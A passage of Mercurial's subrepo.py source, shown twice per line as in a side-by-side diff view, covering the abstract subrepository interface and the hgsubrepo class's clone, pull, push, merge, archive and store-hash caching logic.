517 raise NotImplementedError
517 raise NotImplementedError
518
518
519 def get(self, state, overwrite=False):
519 def get(self, state, overwrite=False):
520 """run whatever commands are needed to put the subrepo into
520 """run whatever commands are needed to put the subrepo into
521 this state
521 this state
522 """
522 """
523 raise NotImplementedError
523 raise NotImplementedError
524
524
525 def merge(self, state):
525 def merge(self, state):
526 """merge currently-saved state with the new state."""
526 """merge currently-saved state with the new state."""
527 raise NotImplementedError
527 raise NotImplementedError
528
528
529 def push(self, opts):
529 def push(self, opts):
530 """perform whatever action is analogous to 'hg push'
530 """perform whatever action is analogous to 'hg push'
531
531
532 This may be a no-op on some systems.
532 This may be a no-op on some systems.
533 """
533 """
534 raise NotImplementedError
534 raise NotImplementedError
535
535
536 def add(self, ui, match, prefix, explicitonly, **opts):
536 def add(self, ui, match, prefix, explicitonly, **opts):
537 return []
537 return []
538
538
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
539 def addremove(self, matcher, prefix, opts, dry_run, similarity):
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
540 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
541 return 1
541 return 1
542
542
543 def cat(self, match, fm, fntemplate, prefix, **opts):
543 def cat(self, match, fm, fntemplate, prefix, **opts):
544 return 1
544 return 1
545
545
546 def status(self, rev2, **opts):
546 def status(self, rev2, **opts):
547 return scmutil.status([], [], [], [], [], [], [])
547 return scmutil.status([], [], [], [], [], [], [])
548
548
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
549 def diff(self, ui, diffopts, node2, match, prefix, **opts):
550 pass
550 pass
551
551
552 def outgoing(self, ui, dest, opts):
552 def outgoing(self, ui, dest, opts):
553 return 1
553 return 1
554
554
555 def incoming(self, ui, source, opts):
555 def incoming(self, ui, source, opts):
556 return 1
556 return 1
557
557
558 def files(self):
558 def files(self):
559 """return filename iterator"""
559 """return filename iterator"""
560 raise NotImplementedError
560 raise NotImplementedError
561
561
562 def filedata(self, name, decode):
562 def filedata(self, name, decode):
563 """return file data, optionally passed through repo decoders"""
563 """return file data, optionally passed through repo decoders"""
564 raise NotImplementedError
564 raise NotImplementedError
565
565
566 def fileflags(self, name):
566 def fileflags(self, name):
567 """return file flags"""
567 """return file flags"""
568 return ''
568 return ''
569
569
570 def getfileset(self, expr):
570 def getfileset(self, expr):
571 """Resolve the fileset expression for this repo"""
571 """Resolve the fileset expression for this repo"""
572 return set()
572 return set()
573
573
574 def printfiles(self, ui, m, fm, fmt, subrepos):
574 def printfiles(self, ui, m, fm, fmt, subrepos):
575 """handle the files command for this subrepo"""
575 """handle the files command for this subrepo"""
576 return 1
576 return 1
577
577
578 def archive(self, archiver, prefix, match=None, decode=True):
578 def archive(self, archiver, prefix, match=None, decode=True):
579 if match is not None:
579 if match is not None:
580 files = [f for f in self.files() if match(f)]
580 files = [f for f in self.files() if match(f)]
581 else:
581 else:
582 files = self.files()
582 files = self.files()
583 total = len(files)
583 total = len(files)
584 relpath = subrelpath(self)
584 relpath = subrelpath(self)
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
585 self.ui.progress(_('archiving (%s)') % relpath, 0,
586 unit=_('files'), total=total)
586 unit=_('files'), total=total)
587 for i, name in enumerate(files):
587 for i, name in enumerate(files):
588 flags = self.fileflags(name)
588 flags = self.fileflags(name)
589 mode = 'x' in flags and 0o755 or 0o644
589 mode = 'x' in flags and 0o755 or 0o644
590 symlink = 'l' in flags
590 symlink = 'l' in flags
591 archiver.addfile(prefix + self._path + '/' + name,
591 archiver.addfile(prefix + self._path + '/' + name,
592 mode, symlink, self.filedata(name, decode))
592 mode, symlink, self.filedata(name, decode))
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
593 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
594 unit=_('files'), total=total)
594 unit=_('files'), total=total)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
595 self.ui.progress(_('archiving (%s)') % relpath, None)
596 return total
596 return total
597
597
598 def walk(self, match):
598 def walk(self, match):
599 '''
599 '''
600 walk recursively through the directory tree, finding all files
600 walk recursively through the directory tree, finding all files
601 matched by the match function
601 matched by the match function
602 '''
602 '''
603 pass
603 pass
604
604
605 def forget(self, match, prefix):
605 def forget(self, match, prefix):
606 return ([], [])
606 return ([], [])
607
607
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
608 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
609 """remove the matched files from the subrepository and the filesystem,
609 """remove the matched files from the subrepository and the filesystem,
610 possibly by force and/or after the file has been removed from the
610 possibly by force and/or after the file has been removed from the
611 filesystem. Return 0 on success, 1 on any warning.
611 filesystem. Return 0 on success, 1 on any warning.
612 """
612 """
613 warnings.append(_("warning: removefiles not implemented (%s)")
613 warnings.append(_("warning: removefiles not implemented (%s)")
614 % self._path)
614 % self._path)
615 return 1
615 return 1
616
616
617 def revert(self, substate, *pats, **opts):
617 def revert(self, substate, *pats, **opts):
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
618 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
619 % (substate[0], substate[2]))
619 % (substate[0], substate[2]))
620 return []
620 return []
621
621
622 def shortid(self, revid):
622 def shortid(self, revid):
623 return revid
623 return revid
624
624
625 def verify(self):
625 def verify(self):
626 '''verify the integrity of the repository. Return 0 on success or
626 '''verify the integrity of the repository. Return 0 on success or
627 warning, 1 on any error.
627 warning, 1 on any error.
628 '''
628 '''
629 return 0
629 return 0
630
630
631 @propertycache
631 @propertycache
632 def wvfs(self):
632 def wvfs(self):
633 """return vfs to access the working directory of this subrepository
633 """return vfs to access the working directory of this subrepository
634 """
634 """
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
635 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
636
636
637 @propertycache
637 @propertycache
638 def _relpath(self):
638 def _relpath(self):
639 """return path to this subrepository as seen from outermost repository
639 """return path to this subrepository as seen from outermost repository
640 """
640 """
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
642
642
643 class hgsubrepo(abstractsubrepo):
643 class hgsubrepo(abstractsubrepo):
644 def __init__(self, ctx, path, state, allowcreate):
644 def __init__(self, ctx, path, state, allowcreate):
645 super(hgsubrepo, self).__init__(ctx, path)
645 super(hgsubrepo, self).__init__(ctx, path)
646 self._state = state
646 self._state = state
647 r = ctx.repo()
647 r = ctx.repo()
648 root = r.wjoin(path)
648 root = r.wjoin(path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
650 self._repo = hg.repository(r.baseui, root, create=create)
650 self._repo = hg.repository(r.baseui, root, create=create)
651
651
652 # Propagate the parent's --hidden option
652 # Propagate the parent's --hidden option
653 if r is r.unfiltered():
653 if r is r.unfiltered():
654 self._repo = self._repo.unfiltered()
654 self._repo = self._repo.unfiltered()
655
655
656 self.ui = self._repo.ui
656 self.ui = self._repo.ui
657 for s, k in [('ui', 'commitsubrepos')]:
657 for s, k in [('ui', 'commitsubrepos')]:
658 v = r.ui.config(s, k)
658 v = r.ui.config(s, k)
659 if v:
659 if v:
660 self.ui.setconfig(s, k, v, 'subrepo')
660 self.ui.setconfig(s, k, v, 'subrepo')
661 # internal config: ui._usedassubrepo
661 # internal config: ui._usedassubrepo
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
663 self._initrepo(r, state[0], create)
663 self._initrepo(r, state[0], create)
664
664
665 @annotatesubrepoerror
665 @annotatesubrepoerror
666 def addwebdirpath(self, serverpath, webconf):
666 def addwebdirpath(self, serverpath, webconf):
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
668
668
669 def storeclean(self, path):
669 def storeclean(self, path):
670 with self._repo.lock():
670 with self._repo.lock():
671 return self._storeclean(path)
671 return self._storeclean(path)
672
672
673 def _storeclean(self, path):
673 def _storeclean(self, path):
674 clean = True
674 clean = True
675 itercache = self._calcstorehash(path)
675 itercache = self._calcstorehash(path)
676 for filehash in self._readstorehashcache(path):
676 for filehash in self._readstorehashcache(path):
677 if filehash != next(itercache, None):
677 if filehash != next(itercache, None):
678 clean = False
678 clean = False
679 break
679 break
680 if clean:
680 if clean:
681 # if not empty:
681 # if not empty:
682 # the cached and current pull states have a different size
682 # the cached and current pull states have a different size
683 clean = next(itercache, None) is None
683 clean = next(itercache, None) is None
684 return clean
684 return clean
685
685
686 def _calcstorehash(self, remotepath):
686 def _calcstorehash(self, remotepath):
687 '''calculate a unique "store hash"
687 '''calculate a unique "store hash"
688
688
689 This method is used to to detect when there are changes that may
689 This method is used to to detect when there are changes that may
690 require a push to a given remote path.'''
690 require a push to a given remote path.'''
691 # sort the files that will be hashed in increasing (likely) file size
691 # sort the files that will be hashed in increasing (likely) file size
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
693 yield '# %s\n' % _expandedabspath(remotepath)
693 yield '# %s\n' % _expandedabspath(remotepath)
694 vfs = self._repo.vfs
694 vfs = self._repo.vfs
695 for relname in filelist:
695 for relname in filelist:
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
697 yield '%s = %s\n' % (relname, filehash)
697 yield '%s = %s\n' % (relname, filehash)
698
698
699 @propertycache
699 @propertycache
700 def _cachestorehashvfs(self):
700 def _cachestorehashvfs(self):
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
702
702
703 def _readstorehashcache(self, remotepath):
703 def _readstorehashcache(self, remotepath):
704 '''read the store hash cache for a given remote repository'''
704 '''read the store hash cache for a given remote repository'''
705 cachefile = _getstorehashcachename(remotepath)
705 cachefile = _getstorehashcachename(remotepath)
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
707
707
708 def _cachestorehash(self, remotepath):
708 def _cachestorehash(self, remotepath):
709 '''cache the current store hash
709 '''cache the current store hash
710
710
711 Each remote repo requires its own store hash cache, because a subrepo
711 Each remote repo requires its own store hash cache, because a subrepo
712 store may be "clean" versus a given remote repo, but not versus another
712 store may be "clean" versus a given remote repo, but not versus another
713 '''
713 '''
714 cachefile = _getstorehashcachename(remotepath)
714 cachefile = _getstorehashcachename(remotepath)
715 with self._repo.lock():
715 with self._repo.lock():
716 storehash = list(self._calcstorehash(remotepath))
716 storehash = list(self._calcstorehash(remotepath))
717 vfs = self._cachestorehashvfs
717 vfs = self._cachestorehashvfs
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
719
719
720 def _getctx(self):
720 def _getctx(self):
721 '''fetch the context for this subrepo revision, possibly a workingctx
721 '''fetch the context for this subrepo revision, possibly a workingctx
722 '''
722 '''
723 if self._ctx.rev() is None:
723 if self._ctx.rev() is None:
724 return self._repo[None] # workingctx if parent is workingctx
724 return self._repo[None] # workingctx if parent is workingctx
725 else:
725 else:
726 rev = self._state[1]
726 rev = self._state[1]
727 return self._repo[rev]
727 return self._repo[rev]
728
728
729 @annotatesubrepoerror
729 @annotatesubrepoerror
730 def _initrepo(self, parentrepo, source, create):
730 def _initrepo(self, parentrepo, source, create):
731 self._repo._subparent = parentrepo
731 self._repo._subparent = parentrepo
732 self._repo._subsource = source
732 self._repo._subsource = source
733
733
734 if create:
734 if create:
735 lines = ['[paths]\n']
735 lines = ['[paths]\n']
736
736
737 def addpathconfig(key, value):
737 def addpathconfig(key, value):
738 if value:
738 if value:
739 lines.append('%s = %s\n' % (key, value))
739 lines.append('%s = %s\n' % (key, value))
740 self.ui.setconfig('paths', key, value, 'subrepo')
740 self.ui.setconfig('paths', key, value, 'subrepo')
741
741
742 defpath = _abssource(self._repo, abort=False)
742 defpath = _abssource(self._repo, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
744 addpathconfig('default', defpath)
744 addpathconfig('default', defpath)
745 if defpath != defpushpath:
745 if defpath != defpushpath:
746 addpathconfig('default-push', defpushpath)
746 addpathconfig('default-push', defpushpath)
747
747
748 fp = self._repo.vfs("hgrc", "w", text=True)
748 fp = self._repo.vfs("hgrc", "w", text=True)
749 try:
749 try:
750 fp.write(''.join(lines))
750 fp.write(''.join(lines))
751 finally:
751 finally:
752 fp.close()
752 fp.close()
753
753
754 @annotatesubrepoerror
754 @annotatesubrepoerror
755 def add(self, ui, match, prefix, explicitonly, **opts):
755 def add(self, ui, match, prefix, explicitonly, **opts):
756 return cmdutil.add(ui, self._repo, match,
756 return cmdutil.add(ui, self._repo, match,
757 self.wvfs.reljoin(prefix, self._path),
757 self.wvfs.reljoin(prefix, self._path),
758 explicitonly, **opts)
758 explicitonly, **opts)
759
759
760 @annotatesubrepoerror
760 @annotatesubrepoerror
761 def addremove(self, m, prefix, opts, dry_run, similarity):
761 def addremove(self, m, prefix, opts, dry_run, similarity):
762 # In the same way as sub directories are processed, once in a subrepo,
762 # In the same way as sub directories are processed, once in a subrepo,
763 # always entry any of its subrepos. Don't corrupt the options that will
763 # always entry any of its subrepos. Don't corrupt the options that will
764 # be used to process sibling subrepos however.
764 # be used to process sibling subrepos however.
765 opts = copy.copy(opts)
765 opts = copy.copy(opts)
766 opts['subrepos'] = True
766 opts['subrepos'] = True
767 return scmutil.addremove(self._repo, m,
767 return scmutil.addremove(self._repo, m,
768 self.wvfs.reljoin(prefix, self._path), opts,
768 self.wvfs.reljoin(prefix, self._path), opts,
769 dry_run, similarity)
769 dry_run, similarity)
770
770
771 @annotatesubrepoerror
771 @annotatesubrepoerror
772 def cat(self, match, fm, fntemplate, prefix, **opts):
772 def cat(self, match, fm, fntemplate, prefix, **opts):
773 rev = self._state[1]
773 rev = self._state[1]
774 ctx = self._repo[rev]
774 ctx = self._repo[rev]
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
776 prefix, **opts)
776 prefix, **opts)
777
777
778 @annotatesubrepoerror
778 @annotatesubrepoerror
779 def status(self, rev2, **opts):
779 def status(self, rev2, **opts):
780 try:
780 try:
781 rev1 = self._state[1]
781 rev1 = self._state[1]
782 ctx1 = self._repo[rev1]
782 ctx1 = self._repo[rev1]
783 ctx2 = self._repo[rev2]
783 ctx2 = self._repo[rev2]
784 return self._repo.status(ctx1, ctx2, **opts)
784 return self._repo.status(ctx1, ctx2, **opts)
785 except error.RepoLookupError as inst:
785 except error.RepoLookupError as inst:
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
787 % (inst, subrelpath(self)))
787 % (inst, subrelpath(self)))
788 return scmutil.status([], [], [], [], [], [], [])
788 return scmutil.status([], [], [], [], [], [], [])
789
789
790 @annotatesubrepoerror
790 @annotatesubrepoerror
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
792 try:
792 try:
793 node1 = node.bin(self._state[1])
793 node1 = node.bin(self._state[1])
794 # We currently expect node2 to come from substate and be
794 # We currently expect node2 to come from substate and be
795 # in hex format
795 # in hex format
796 if node2 is not None:
796 if node2 is not None:
797 node2 = node.bin(node2)
797 node2 = node.bin(node2)
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
799 node1, node2, match,
799 node1, node2, match,
800 prefix=posixpath.join(prefix, self._path),
800 prefix=posixpath.join(prefix, self._path),
801 listsubrepos=True, **opts)
801 listsubrepos=True, **opts)
802 except error.RepoLookupError as inst:
802 except error.RepoLookupError as inst:
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
804 % (inst, subrelpath(self)))
804 % (inst, subrelpath(self)))
805
805
806 @annotatesubrepoerror
806 @annotatesubrepoerror
807 def archive(self, archiver, prefix, match=None, decode=True):
807 def archive(self, archiver, prefix, match=None, decode=True):
808 self._get(self._state + ('hg',))
808 self._get(self._state + ('hg',))
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
810 rev = self._state[1]
810 rev = self._state[1]
811 ctx = self._repo[rev]
811 ctx = self._repo[rev]
812 for subpath in ctx.substate:
812 for subpath in ctx.substate:
813 s = subrepo(ctx, subpath, True)
813 s = subrepo(ctx, subpath, True)
814 submatch = matchmod.subdirmatcher(subpath, match)
814 submatch = matchmod.subdirmatcher(subpath, match)
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
816 decode)
816 decode)
817 return total
817 return total
818
818
819 @annotatesubrepoerror
819 @annotatesubrepoerror
820 def dirty(self, ignoreupdate=False, missing=False):
820 def dirty(self, ignoreupdate=False, missing=False):
821 r = self._state[1]
821 r = self._state[1]
822 if r == '' and not ignoreupdate: # no state recorded
822 if r == '' and not ignoreupdate: # no state recorded
823 return True
823 return True
824 w = self._repo[None]
824 w = self._repo[None]
825 if r != w.p1().hex() and not ignoreupdate:
825 if r != w.p1().hex() and not ignoreupdate:
826 # different version checked out
826 # different version checked out
827 return True
827 return True
828 return w.dirty(missing=missing) # working directory changed
828 return w.dirty(missing=missing) # working directory changed
829
829
830 def basestate(self):
830 def basestate(self):
831 return self._repo['.'].hex()
831 return self._repo['.'].hex()
832
832
833 def checknested(self, path):
833 def checknested(self, path):
834 return self._repo._checknested(self._repo.wjoin(path))
834 return self._repo._checknested(self._repo.wjoin(path))
835
835
836 @annotatesubrepoerror
836 @annotatesubrepoerror
837 def commit(self, text, user, date):
837 def commit(self, text, user, date):
838 # don't bother committing in the subrepo if it's only been
838 # don't bother committing in the subrepo if it's only been
839 # updated
839 # updated
840 if not self.dirty(True):
840 if not self.dirty(True):
841 return self._repo['.'].hex()
841 return self._repo['.'].hex()
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
843 n = self._repo.commit(text, user, date)
843 n = self._repo.commit(text, user, date)
844 if not n:
844 if not n:
845 return self._repo['.'].hex() # different version checked out
845 return self._repo['.'].hex() # different version checked out
846 return node.hex(n)
846 return node.hex(n)
847
847
848 @annotatesubrepoerror
848 @annotatesubrepoerror
849 def phase(self, state):
849 def phase(self, state):
850 return self._repo[state].phase()
850 return self._repo[state].phase()
851
851
852 @annotatesubrepoerror
852 @annotatesubrepoerror
853 def remove(self):
853 def remove(self):
854 # we can't fully delete the repository as it may contain
854 # we can't fully delete the repository as it may contain
855 # local-only history
855 # local-only history
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
857 hg.clean(self._repo, node.nullid, False)
857 hg.clean(self._repo, node.nullid, False)
858
858
859 def _get(self, state):
859 def _get(self, state):
860 source, revision, kind = state
860 source, revision, kind = state
861 if revision in self._repo.unfiltered():
861 if revision in self._repo.unfiltered():
862 return True
862 return True
863 self._repo._subsource = source
863 self._repo._subsource = source
864 srcurl = _abssource(self._repo)
864 srcurl = _abssource(self._repo)
865 other = hg.peer(self._repo, {}, srcurl)
865 other = hg.peer(self._repo, {}, srcurl)
866 if len(self._repo) == 0:
866 if len(self._repo) == 0:
867 self.ui.status(_('cloning subrepo %s from %s\n')
867 self.ui.status(_('cloning subrepo %s from %s\n')
868 % (subrelpath(self), srcurl))
868 % (subrelpath(self), srcurl))
869 parentrepo = self._repo._subparent
869 parentrepo = self._repo._subparent
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
871 self._repo.vfs.rmtree()
871 self._repo.vfs.rmtree()
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
873 other, self._repo.root,
873 other, self._repo.root,
874 update=False)
874 update=False)
875 self._repo = cloned.local()
875 self._repo = cloned.local()
876 self._initrepo(parentrepo, source, create=True)
876 self._initrepo(parentrepo, source, create=True)
877 self._cachestorehash(srcurl)
877 self._cachestorehash(srcurl)
878 else:
878 else:
879 self.ui.status(_('pulling subrepo %s from %s\n')
879 self.ui.status(_('pulling subrepo %s from %s\n')
880 % (subrelpath(self), srcurl))
880 % (subrelpath(self), srcurl))
881 cleansub = self.storeclean(srcurl)
881 cleansub = self.storeclean(srcurl)
882 exchange.pull(self._repo, other)
882 exchange.pull(self._repo, other)
883 if cleansub:
883 if cleansub:
884 # keep the repo clean after pull
884 # keep the repo clean after pull
885 self._cachestorehash(srcurl)
885 self._cachestorehash(srcurl)
886 return False
886 return False
887
887
888 @annotatesubrepoerror
888 @annotatesubrepoerror
889 def get(self, state, overwrite=False):
889 def get(self, state, overwrite=False):
890 inrepo = self._get(state)
890 inrepo = self._get(state)
891 source, revision, kind = state
891 source, revision, kind = state
892 repo = self._repo
892 repo = self._repo
893 repo.ui.debug("getting subrepo %s\n" % self._path)
893 repo.ui.debug("getting subrepo %s\n" % self._path)
894 if inrepo:
894 if inrepo:
895 urepo = repo.unfiltered()
895 urepo = repo.unfiltered()
896 ctx = urepo[revision]
896 ctx = urepo[revision]
897 if ctx.hidden():
897 if ctx.hidden():
898 urepo.ui.warn(
898 urepo.ui.warn(
899 _('revision %s in subrepository "%s" is hidden\n') \
899 _('revision %s in subrepository "%s" is hidden\n') \
900 % (revision[0:12], self._path))
900 % (revision[0:12], self._path))
901 repo = urepo
901 repo = urepo
902 hg.updaterepo(repo, revision, overwrite)
902 hg.updaterepo(repo, revision, overwrite)
903
903
904 @annotatesubrepoerror
904 @annotatesubrepoerror
905 def merge(self, state):
905 def merge(self, state):
906 self._get(state)
906 self._get(state)
907 cur = self._repo['.']
907 cur = self._repo['.']
908 dst = self._repo[state[1]]
908 dst = self._repo[state[1]]
909 anc = dst.ancestor(cur)
909 anc = dst.ancestor(cur)
910
910
911 def mergefunc():
911 def mergefunc():
912 if anc == cur and dst.branch() == cur.branch():
912 if anc == cur and dst.branch() == cur.branch():
913 self.ui.debug('updating subrepository "%s"\n'
913 self.ui.debug('updating subrepository "%s"\n'
914 % subrelpath(self))
914 % subrelpath(self))
915 hg.update(self._repo, state[1])
915 hg.update(self._repo, state[1])
916 elif anc == dst:
916 elif anc == dst:
917 self.ui.debug('skipping subrepository "%s"\n'
917 self.ui.debug('skipping subrepository "%s"\n'
918 % subrelpath(self))
918 % subrelpath(self))
919 else:
919 else:
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
921 hg.merge(self._repo, state[1], remind=False)
921 hg.merge(self._repo, state[1], remind=False)
922
922
923 wctx = self._repo[None]
923 wctx = self._repo[None]
924 if self.dirty():
924 if self.dirty():
925 if anc != dst:
925 if anc != dst:
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
927 mergefunc()
927 mergefunc()
928 else:
928 else:
929 mergefunc()
929 mergefunc()
930 else:
930 else:
931 mergefunc()
931 mergefunc()
932
932
933 @annotatesubrepoerror
933 @annotatesubrepoerror
934 def push(self, opts):
934 def push(self, opts):
935 force = opts.get('force')
935 force = opts.get('force')
936 newbranch = opts.get('new_branch')
936 newbranch = opts.get('new_branch')
937 ssh = opts.get('ssh')
937 ssh = opts.get('ssh')
938
938
939 # push subrepos depth-first for coherent ordering
939 # push subrepos depth-first for coherent ordering
940 c = self._repo['']
940 c = self._repo['']
941 subs = c.substate # only repos that are committed
941 subs = c.substate # only repos that are committed
942 for s in sorted(subs):
942 for s in sorted(subs):
943 if c.sub(s).push(opts) == 0:
943 if c.sub(s).push(opts) == 0:
944 return False
944 return False
945
945
946 dsturl = _abssource(self._repo, True)
946 dsturl = _abssource(self._repo, True)
947 if not force:
947 if not force:
948 if self.storeclean(dsturl):
948 if self.storeclean(dsturl):
949 self.ui.status(
949 self.ui.status(
950 _('no changes made to subrepo %s since last push to %s\n')
950 _('no changes made to subrepo %s since last push to %s\n')
951 % (subrelpath(self), dsturl))
951 % (subrelpath(self), dsturl))
952 return None
952 return None
953 self.ui.status(_('pushing subrepo %s to %s\n') %
953 self.ui.status(_('pushing subrepo %s to %s\n') %
954 (subrelpath(self), dsturl))
954 (subrelpath(self), dsturl))
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
957
957
958 # the repo is now clean
958 # the repo is now clean
959 self._cachestorehash(dsturl)
959 self._cachestorehash(dsturl)
960 return res.cgresult
960 return res.cgresult
961
961
962 @annotatesubrepoerror
962 @annotatesubrepoerror
963 def outgoing(self, ui, dest, opts):
963 def outgoing(self, ui, dest, opts):
964 if 'rev' in opts or 'branch' in opts:
964 if 'rev' in opts or 'branch' in opts:
965 opts = copy.copy(opts)
965 opts = copy.copy(opts)
966 opts.pop('rev', None)
966 opts.pop('rev', None)
967 opts.pop('branch', None)
967 opts.pop('branch', None)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
969
969
970 @annotatesubrepoerror
970 @annotatesubrepoerror
971 def incoming(self, ui, source, opts):
971 def incoming(self, ui, source, opts):
972 if 'rev' in opts or 'branch' in opts:
972 if 'rev' in opts or 'branch' in opts:
973 opts = copy.copy(opts)
973 opts = copy.copy(opts)
974 opts.pop('rev', None)
974 opts.pop('rev', None)
975 opts.pop('branch', None)
975 opts.pop('branch', None)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
977
977
978 @annotatesubrepoerror
978 @annotatesubrepoerror
979 def files(self):
979 def files(self):
980 rev = self._state[1]
980 rev = self._state[1]
981 ctx = self._repo[rev]
981 ctx = self._repo[rev]
982 return ctx.manifest().keys()
982 return ctx.manifest().keys()
983
983
984 def filedata(self, name, decode):
984 def filedata(self, name, decode):
985 rev = self._state[1]
985 rev = self._state[1]
986 data = self._repo[rev][name].data()
986 data = self._repo[rev][name].data()
987 if decode:
987 if decode:
988 data = self._repo.wwritedata(name, data)
988 data = self._repo.wwritedata(name, data)
989 return data
989 return data
990
990
991 def fileflags(self, name):
991 def fileflags(self, name):
992 rev = self._state[1]
992 rev = self._state[1]
993 ctx = self._repo[rev]
993 ctx = self._repo[rev]
994 return ctx.flags(name)
994 return ctx.flags(name)
995
995
996 @annotatesubrepoerror
996 @annotatesubrepoerror
997 def printfiles(self, ui, m, fm, fmt, subrepos):
997 def printfiles(self, ui, m, fm, fmt, subrepos):
998 # If the parent context is a workingctx, use the workingctx here for
998 # If the parent context is a workingctx, use the workingctx here for
999 # consistency.
999 # consistency.
1000 if self._ctx.rev() is None:
1000 if self._ctx.rev() is None:
1001 ctx = self._repo[None]
1001 ctx = self._repo[None]
1002 else:
1002 else:
1003 rev = self._state[1]
1003 rev = self._state[1]
1004 ctx = self._repo[rev]
1004 ctx = self._repo[rev]
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1006
1006
1007 @annotatesubrepoerror
1007 @annotatesubrepoerror
1008 def getfileset(self, expr):
1008 def getfileset(self, expr):
1009 if self._ctx.rev() is None:
1009 if self._ctx.rev() is None:
1010 ctx = self._repo[None]
1010 ctx = self._repo[None]
1011 else:
1011 else:
1012 rev = self._state[1]
1012 rev = self._state[1]
1013 ctx = self._repo[rev]
1013 ctx = self._repo[rev]
1014
1014
1015 files = ctx.getfileset(expr)
1015 files = ctx.getfileset(expr)
1016
1016
1017 for subpath in ctx.substate:
1017 for subpath in ctx.substate:
1018 sub = ctx.sub(subpath)
1018 sub = ctx.sub(subpath)
1019
1019
1020 try:
1020 try:
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1022 except error.LookupError:
1022 except error.LookupError:
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1025 return files
1025 return files
1026
1026
1027 def walk(self, match):
1027 def walk(self, match):
1028 ctx = self._repo[None]
1028 ctx = self._repo[None]
1029 return ctx.walk(match)
1029 return ctx.walk(match)
1030
1030
1031 @annotatesubrepoerror
1031 @annotatesubrepoerror
1032 def forget(self, match, prefix):
1032 def forget(self, match, prefix):
1033 return cmdutil.forget(self.ui, self._repo, match,
1033 return cmdutil.forget(self.ui, self._repo, match,
1034 self.wvfs.reljoin(prefix, self._path), True)
1034 self.wvfs.reljoin(prefix, self._path), True)
1035
1035
1036 @annotatesubrepoerror
1036 @annotatesubrepoerror
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1039 self.wvfs.reljoin(prefix, self._path),
